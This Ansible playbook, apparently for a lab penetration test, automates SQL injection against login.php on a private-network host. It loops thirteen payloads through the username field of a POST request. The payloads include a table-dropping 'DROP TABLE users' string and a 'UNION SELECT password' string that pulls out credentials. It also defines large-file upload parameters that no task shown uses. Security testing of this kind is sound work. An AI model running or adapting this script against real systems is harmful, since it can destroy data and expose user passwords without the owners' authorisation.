---
- name: Web Attack Test
  hosts: localhost
  gather_facts: no
  
  vars:
    attack_servers:
      - 192.168.55.5
      
    sql_payloads:
      - "' OR 1=1--"
      - "'; DROP TABLE users;--"
      - "' UNION SELECT password FROM users--"
      - "' OR '1'='1"
      - "\" OR \"1\"=\"1"
      - "' OR 1=1--"
      - "' AND 1=1--"
      - "' OR 'a'='a"
      - "\" OR \"x\"=\"x"
      - "' OR 1=1#"
      - "' OR 1=1/*"
      - "' OR '1'='1' AND '1'='1"
      - "' OR (1=1 AND 2=2)--"


    temp_directory: "/tmp"
    output_directory: "{{ temp_directory }}/large_files"

    file_sizes: 
      - 10
      - 20
      - 30

    form_data:
      title: "Pentest Upload"
      content: "Security test content"

    timeout_seconds: 10

  tasks:    
    - name: Display SQL Injection Test Matrix
      debug:
        msg: "Target Server: {{ item.0 }} | SQL Payload: {{ item.1 }}"
      loop: "{{ attack_servers | product(sql_payloads) | list }}"
      
    - name: Execute SQL Injection Attack Test
      uri:
        url: "http://{{ item.0 }}/login.php"
        method: POST
        body_format: form-urlencoded
        body:
          username: "{{ item.1 }}"
          password: "test"
        status_code: [200, 403, 500]
        timeout: 5
      register: sqli_test_results
      loop: "{{ attack_servers | product(sql_payloads) | list }}"
      ignore_errors: yes
